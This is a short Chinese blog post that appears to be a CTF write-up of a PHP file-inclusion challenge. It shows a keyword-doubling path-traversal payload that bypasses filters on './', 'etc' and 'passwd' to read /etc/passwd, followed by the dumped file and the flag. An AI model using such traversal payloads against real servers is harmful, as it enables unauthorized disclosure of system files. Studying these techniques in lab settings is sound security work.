一道文件包含的题

作者: Ryans | 来源:发表于2014-09-28 13:48 被阅读113次

一道文件包含的题
一道ISCC题引申的PHP正则复习
今天的数学课也只做一道题
NOIP复赛文件路径怎么写
关于setTimeout的面试题
leetcode 8--java实现atoi
一道CTF-session文件包含
论剑场web21解题
【文件包含】PHP文件包含漏洞
文件包含

题目叫读取/etc/passwd

浏览器输入http://183.213.11.*:4414/stage/11/getfilecontent.php?file=./index.txt

浏览器显示/var/www/stage/11/index.txthalou

经过测试，发现过滤的关键字有

./ etc passwd c/p

因此，根据敏敏感词感词的思想，构造payload如下：

getfilecontent.php?file=...//...//...//...//etetcc/c/ppasspasswdwd

浏览器显示，得到key

/var/www/stage/11/../../../../etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shmysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/falsemessagebus:x:102:106::/var/run/dbus:/bin/falsecolord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/falseusbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/falsemiredo:x:105:65534::/var/run/miredo:/bin/falsentp:x:106:112::/home/ntp:/bin/falseDebian-exim:x:107:113::/var/spool/exim4:/bin/falseavahi:x:108:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/falsebeef-xss:x:109:117::/var/lib/beef-xss:/bin/falsedradis:x:110:119::/var/lib/dradis:/bin/falsepulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/falsespeech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/shhaldaemon:x:113:122:Hardware abstraction layer,,,:/var/run/hald:/bin/falseiodine:x:114:65534::/var/run/iodine:/bin/falsepostgres:x:115:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashsshd:x:116:65534::/var/run/sshd:/usr/sbin/nologinstunnel4:x:117:126::/var/run/stunnel4:/bin/falsestatd:x:118:65534::/var/lib/nfs:/bin/falsesslh:x:119:128::/nonexistent:/bin/falseDebian-gdm:x:120:129:Gnome Display Manager:/var/lib/gdm3:/bin/falsertkit:x:121:130:RealtimeKit,,,:/proc:/bin/falsesaned:x:122:131::/home/saned:/bin/falsesnmp:x:123:132::/var/lib/snmp:/bin/falseKey:2986372947239ABC